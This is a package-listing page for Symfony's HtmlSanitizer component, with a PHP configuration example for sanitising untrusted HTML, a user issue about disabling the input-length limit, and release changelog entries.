Html-sanitizer - The HtmlSanitizer component provides an object-oriented API to sanitize untrusted HTML input for safe insertion into a document's DOM.

Overview

HtmlSanitizer Component

The HtmlSanitizer component provides an object-oriented API to sanitize untrusted HTML input for safe insertion into a document's DOM.

Usage

use Symfony\Component\HtmlSanitizer\HtmlSanitizerConfig;
use Symfony\Component\HtmlSanitizer\HtmlSanitizer;

// By default, an element not added to the allowed or blocked elements
// will be dropped, including its children
$config = (new HtmlSanitizerConfig())
    // Allow "safe" elements and attributes. All scripts will be removed
    // as well as other dangerous behaviors like CSS injection
    ->allowSafeElements()

    // Allow all static elements and attributes from the W3C Sanitizer API
    // standard. All scripts will be removed but the output may still contain
    // other dangerous behaviors like CSS injection (click-jacking), CSS
    // expressions, ...
    ->allowAllStaticElements()

    // Allow the "div" element and no attribute can be on it
    ->allowElement('div')

    // Allow the "a" element, and the "title" attribute to be on it
    ->allowElement('a', ['title'])

    // Allow the "span" element, and any attribute from the Sanitizer API is allowed
    // (see https://wicg.github.io/sanitizer-api/#default-configuration)
    ->allowElement('span', '*')

    // Block the "section" element: this element will be removed but
    // its children will be retained
    ->blockElement('section')

    // Drop the "div" element: this element will be removed, including its children
    ->dropElement('div')

    // Allow the attribute "title" on the "div" element
    ->allowAttribute('title', ['div'])

    // Allow the attribute "data-custom-attr" on all currently allowed elements
    ->allowAttribute('data-custom-attr', '*')

    // Drop the "data-custom-attr" attribute from the "div" element:
    // this attribute will be removed
    ->dropAttribute('data-custom-attr', ['div'])

    // Drop the "data-custom-attr" attribute from all elements:
    // this attribute will be removed
    ->dropAttribute('data-custom-attr', '*')

    // Forcefully set the value of all "rel" attributes on "a"
    // elements to "noopener noreferrer"
    ->forceAttribute('a', 'rel', 'noopener noreferrer')

    // Transform all HTTP schemes to HTTPS
    ->forceHttpsUrls()

    // Configure which schemes are allowed in links (others will be dropped)
    ->allowedLinkSchemes(['https', 'http', 'mailto'])

    // Configure which hosts are allowed in links (by default all are allowed)
    ->allowedLinkHosts(['symfony.com', 'example.com'])

    // Allow relative URL in links (by default they are dropped)
    ->allowRelativeLinks()

    // Configure which schemes are allowed in img/audio/video/iframe (others will be dropped)
    ->allowedMediaSchemes(['https', 'http'])

    // Configure which hosts are allowed in img/audio/video/iframe (by default all are allowed)
    ->allowedMediaHosts(['symfony.com', 'example.com'])

    // Allow relative URL in img/audio/video/iframe (by default they are dropped)
    ->allowRelativeMedias()

    // Configure a custom attribute sanitizer to apply custom sanitization logic
    // ($attributeSanitizer instance of AttributeSanitizerInterface)
    ->withAttributeSanitizer($attributeSanitizer)

    // Unregister a previously registered attribute sanitizer
    // ($attributeSanitizer instance of AttributeSanitizerInterface)
    ->withoutAttributeSanitizer($attributeSanitizer)
;

$sanitizer = new HtmlSanitizer($config);

// Sanitize a given string, using the configuration provided and in the
// "body" context (tags only allowed in <head> will be removed)
$sanitizer->sanitize($userInput);

// Sanitize the given string for a usage in a <head> tag
$sanitizer->sanitizeFor('head', $userInput);

// Sanitize the given string for a usage in another tag
$sanitizer->sanitizeFor('title', $userInput); // Will encode as HTML entities
$sanitizer->sanitizeFor('textarea', $userInput); // Will encode as HTML entities
$sanitizer->sanitizeFor('div', $userInput); // Will sanitize as body
$sanitizer->sanitizeFor('section', $userInput); // Will sanitize as body
// ...

Resources

You might also like...
LaravelFly is a safe solution to speeds up new or old Laravel 5.5+ projects, with preloading and coroutine, while without data pollution or memory leak

Would you like php 7.4 Preloading? Would you like php coroutine? Today you can use them with Laravel because of Swoole. With LaravalFly, Laravel will

A Laravel package for parsing and processing Identity Documents

Laravel Identity Documents For general questions and suggestions join gitter: Package that allows you to handle documents like passports and other doc

Laravel package for creating Word documents with Eloquent ORM dependencies.

Laravel Eloquent Word This package provides an elegant way to generate Word documents with Eloquent Models. Uses PHPOffice/PHPWord package to generate

Livewire component that provides you with a modal that supports multiple child modals while maintaining state.
Livewire component that provides you with a modal that supports multiple child modals while maintaining state.

About LivewireUI Modal LivewireUI Modal is a Livewire component that provides you with a modal that supports multiple child modals while maintaining s

Livewire component that provides you with a modal that supports multiple child modals while maintaining state.
Livewire component that provides you with a modal that supports multiple child modals while maintaining state.

About Wire Elements Modal Wire Elements Modal is a Livewire component that provides you with a modal that supports multiple child modals while maintai

Laravel package that converts your application into a static HTML website
Laravel package that converts your application into a static HTML website

phpReel Static Laravel Package phpReel Static is a simple Laravel Package created and used by phpReel that converts your Laravel application to a stat

Laravel Package for TMDB ( The Movie Database ) API. Provides easy access to the wtfzdotnet/php-tmdb-api library.

Laravel Package for TMDB API Wrapper A Laravel package that provides easy access to the php-tmdb/api TMDB (The Movie Database) API wrapper. This packa

Convert remote api response data into laravel model
Convert remote api response data into laravel model

laravel remote model Create remote driver to convert remote api request into laravel model. 中文文档 日本語文書 overview Install the version between laravel5.5

Laravel Responder - a package for building API responses, integrating Fractal into Laravel and Lumen
Laravel Responder - a package for building API responses, integrating Fractal into Laravel and Lumen

A Laravel Fractal package for building API responses, giving you the power of Fractal with Laravel's elegancy.

Comments
  • [HtmlSanitizer] maxInputLength can be disabled

    [HtmlSanitizer] maxInputLength can be disabled

    I have very long html because of base64 encoded images. Using $config->withMaxInputLength(strlen($content)) is useless. Using $config->withMaxInputLength(null) to turn off the check is a better alternative.

    opened by MartkCz 1
Releases(v6.2.2)
  • v6.2.2(Dec 16, 2022)

    Changelog (https://github.com/symfony/html-sanitizer/compare/v6.2.1...v6.2.2)

    • bug #48602 Fix HtmlSanitizer default configuration behavior for allowed schemes (Titouan Galopin)
    Source code(tar.gz)
    Source code(zip)
  • v6.2.0(Nov 30, 2022)

  • v6.2.0-RC1(Nov 25, 2022)

  • v6.2.0-BETA1(Oct 24, 2022)

  • v6.1.0(May 27, 2022)

  • v6.1.0-RC1(May 14, 2022)

    Changelog (https://github.com/symfony/html-sanitizer/compare/v6.1.0-BETA2...v6.1.0-RC1)

    • bug #46274 Fix node renderer handling of self-closing (void) elements (omniError)
    Source code(tar.gz)
    Source code(zip)
  • v6.1.0-BETA2(Apr 27, 2022)

  • v6.1.0-BETA1(Apr 15, 2022)

    Changelog (https://github.com/symfony/html-sanitizer/compare/v6.0.7...v6.1.0-BETA1)

    • feature #45377 Bump minimum version of PHP to 8.1 (nicolas-grekas)
    • feature #44681 Introduce HtmlSanitizer component (tgalopin)
    Source code(tar.gz)
    Source code(zip)
Render a Livewire component on a specific target in the DOM.

Livewire Portals Render a Livewire component on a specific target in the DOM. Install THIS PACKAGE IS STILL IN DEVELOPMENT, TO USE, PLEASE ADD THE FOL

Jeff Ochoa 20 Aug 11, 2022
Provides an object-oriented API to generate and represent UIDs.

Uid Component The UID component provides an object-oriented API to generate and represent UIDs. Resources Documentation Contributing Report issues and

Symfony 343 Jan 5, 2023
A TALL-based Laravel Livewire component to replace the (multiple) select HTML input form with beautiful cards.

TALL multiselect cards A TALL-based Laravel Livewire component to replace the (multiple) select HTML input form with beautiful cards. Table of content

Frederic Habich 19 Dec 14, 2022
Object-oriented, composable, fluent API for writing validations in Laravel

Laravel Hyrule Hyrule provides an object-oriented, fluent API for building validation rules for use w/ Laravel's Validation component. This unlocks pa

Square 330 Dec 8, 2022
A laravel package to handle sanitize process of model data to create/update model records.

Laravel Model UUID A simple package to sanitize model data to create/update table records. Installation Require the package using composer: composer r

null 66 Sep 19, 2022
PHP 5.3 Object Oriented image manipulation library

Imagine Tweet about it using the #php_imagine hashtag. Image manipulation library for PHP 5.3 inspired by Python's PIL and other image libraries. Requ

null 4.3k Dec 29, 2022
Laravel Livewire (TALL-stack) form generator with realtime validation, file uploads, array fields, blade form input components and more.

TALL-stack form generator Laravel Livewire, Tailwind forms with auto-generated views. Support Contributions Features This is not an admin panel genera

TinaH 622 Jan 2, 2023
Library that offers Input Filtering based on Annotations for use with Objects. Check out 2.dev for 2.0 pre-release.

DMS Filter Component This library provides a service that can be used to filter object values based on annotations Install Use composer to add DMS\Fil

Rafael Dohms 89 Nov 28, 2022
Keyword Generator Tool helps you discover keyword opportunities related to your query input.

This plugin simply helps you discover keyword opportunities related to your query input. Installation Download the zip file of the repository or clone

WP Refers 1 May 3, 2022
Validate your input data in a simple way, an easy way and right way. no framework required. For simple or large. project.

wepesi_validation this module will help to do your own input validation from http request POST or GET. INTEGRATION The integration is the simple thing

Boss 4 Dec 17, 2022